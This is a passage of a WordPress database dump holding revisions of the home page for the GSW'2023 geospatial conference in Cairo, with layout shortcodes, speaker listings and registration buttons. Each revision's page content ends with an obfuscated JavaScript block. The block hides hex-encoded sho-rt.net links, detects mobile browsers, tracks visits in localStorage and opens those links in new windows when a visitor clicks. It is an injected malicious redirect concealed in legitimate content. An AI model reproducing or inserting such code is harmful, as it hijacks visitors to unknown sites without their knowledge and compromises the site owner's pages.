|nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-07 12:40:22','2022-10-07 12:40:22','',2167,'https://gsw2023.com/?p=2379',0,'revision','',0),
(2381,1,'2022-10-07 12:49:30','2022-10-07 12:49:30','[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]\r\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\r\n[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]\r\n<h6>Geospatial Week Director ,The University of Calgary</h6>\r\n[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm.gsw2023.com%2Fpages%2Fregistration.html\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665131484276{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:%20https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665135361340{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665123014762{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #3098E3), color-stop(54%, #6FA1D4), color-stop(81%, #488CBD), color-stop(95%, #3298CF));background: -moz-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -webkit-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -o-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -ms-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023 BY\" main_heading_color=\"#f27304\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_row_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"2325\" alignment=\"center\" onclick=\"custom_link\" img_link_target=\"_blank\" title=\"AASTMT\" link=\"https://aast.edu/en/\"][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_single_image image=\"2326\" alignment=\"center\" onclick=\"custom_link\" img_link_target=\"_blank\" title=\"ISPRS\" link=\"https://www.isprs.org/\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home','','inherit','closed','closed','','2167-revision-v1','','','2022-10-07 12:49:33','2022-10-07 12:49:33','',2167,'https://gsw2023.com/?p=2381',0,'revision','',0),
(2382,1,'2022-10-07 12:54:49','2022-10-07 12:54:49','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" 